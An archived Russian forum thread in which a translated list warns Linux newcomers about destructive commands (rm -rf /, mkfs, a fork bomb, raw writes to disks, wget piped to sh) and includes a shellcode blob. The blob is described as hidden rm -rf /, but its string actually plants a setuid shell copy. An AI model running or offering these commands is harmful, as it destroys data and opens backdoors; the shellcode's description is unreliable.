PDA

Просмотр полной версии : 7 смертельных команд Linux


lsmod
02.12.2008, 15:04
7 смертельных команд Linux

Если вы новичок в Linux, есть шансы встретить человека где-нибудь на форуме или в чате, который может глупо пошутить с вами, предложив для использования команды, которые нанесут вред вашим файлам или даже всей операционной системе. Чтобы избежать этого опасного сценария, предлагаю вам ознакомиться со списком смертельных команд Linux, которые следует избегать.

1.

rm -rf /

Эта команда будет рекурсивно и принудительно удалять все файлы внутри корневого каталога.

2.

char esp[] __attribute__ ((section(".text"))) /* e.s.p
release */
= "\xeb\x3e\x5b\x31\xc0\x50\x54\x5a\x83\xec\x64\x68"
"\xff\xff\xff\xff\x68\xdf\xd0\xdf\xd9\x68\x8d\x99"
"\xdf\x81\x68\x8d\x92\xdf\xd2\x54\x5e\xf7\x16\xf7"
"\x56\x04\xf7\x56\x08\xf7\x56\x0c\x83\xc4\x74\x56"
"\x8d\x73\x08\x56\x53\x54\x59\xb0\x0b\xcd\x80\x31"
"\xc0\x40\xeb\xf9\xe8\xbd\xff\xff\xff\x2f\x62\x69"
"\x6e\x2f\x73\x68\x00\x2d\x63\x00"
"cp -p /bin/sh /tmp/.beyond; chmod 4755
/tmp/.beyond;";

Это шестнадцатиричная версия [rm -rf /], которая может ввести в заблуждение даже опытного пользователя Linux.

3.

mkfs.ext3 /dev/sda

Эта команда переформатирует и полностью уничтожит все файлы устройства, которое упоминается после команды mkfs.

4.

:(){:|:&};:

Известная как forkbomb, эта команда заставит вашу систему запустить огромное количество процессов - до тех пор, пока система не зависнет. Это часто может привести к повреждению данных.

5.

any_command > /dev/sda

С этой командой исходные (raw) данные будут записываться на блочное устройство, что обычно может разгромить файловую систему с полной потерей данных.

6.

wget http://some_untrusted_source -O- | sh

Загружает из ненадежных источников а затем выполняет возможно вредоносные коды, которые вам подсунули.

7.

mv /home/yourhomedirectory/* /dev/null

Эта команда переместит все файлы из вашей домашней директории в место, которого не существует, поэтому вы больше никогда не увидите эти файлы.

Разумеется, есть и другие столь же смертельные команды Linux, которые мне не удалось сюда включить. Поэтому, если вам есть что добавить, поделитесь с нами в комментариях.

Оригинал-источник: http://www.junauza.com/2008/11/7-deadly-linux-commands.html
Перевод на русский язык: http://pingvinshop.com.ua/programmyi/7-smertelnyih-komand-linux-3.html

P.S.

1. Чуть поправил перевод.
2. Справедливости ради отмечу, что в нормально настроенной системе для деструктивного действия указанным командам нужны права root.
3. Некоторые команды из списка просто неработоспособны. По крайней мере в моей системе.

Несмотря на это в целом сообщение полезное, ибо следует иметь в виду, что бездумно запускать на выполнение команды, да ещё с правами root, может быть очень рискованно.

От себя добавлю, что действие команды rm "по умолчанию" может быть не менее губительным. Чтобы избежать печальных последствий следует использовать опцию -i, ещё лучше прописать её в алиас, если это не сделали дистростроители.

Весёлый Молочник
02.12.2008, 15:23
Прикольно. Сюда бы ещё перловую команду на удаление всего в системе, которая на лоре была.

LegeN
02.12.2008, 17:55
а для виндовса такого нету?
знаю один для висты без первого сервис пака, вроде WIN+E жмеш не отпуская, виста зависает от афигенного количества "моего компьютера")))

SysAd
02.12.2008, 17:57
А-ля западлостроение :)?

KenJi
02.12.2008, 20:59
а для виндовса такого нету?
знаю один для висты без первого сервис пака, вроде WIN+E жмеш не отпуская, виста зависает от афигенного количества "моего компьютера")))

ради эксперемента на ноуте(!) зажал на секнунд 10-15, минут десять думал но все обработал! Пачкой закрыл

0 вреда системе(виста без сп1)

LegeN
02.12.2008, 21:02
незнаю незнаю, у меня на висте без сервис пака первого, за 15 секунд завис намертво... в сп1 это исправили хоть сколько нажимай)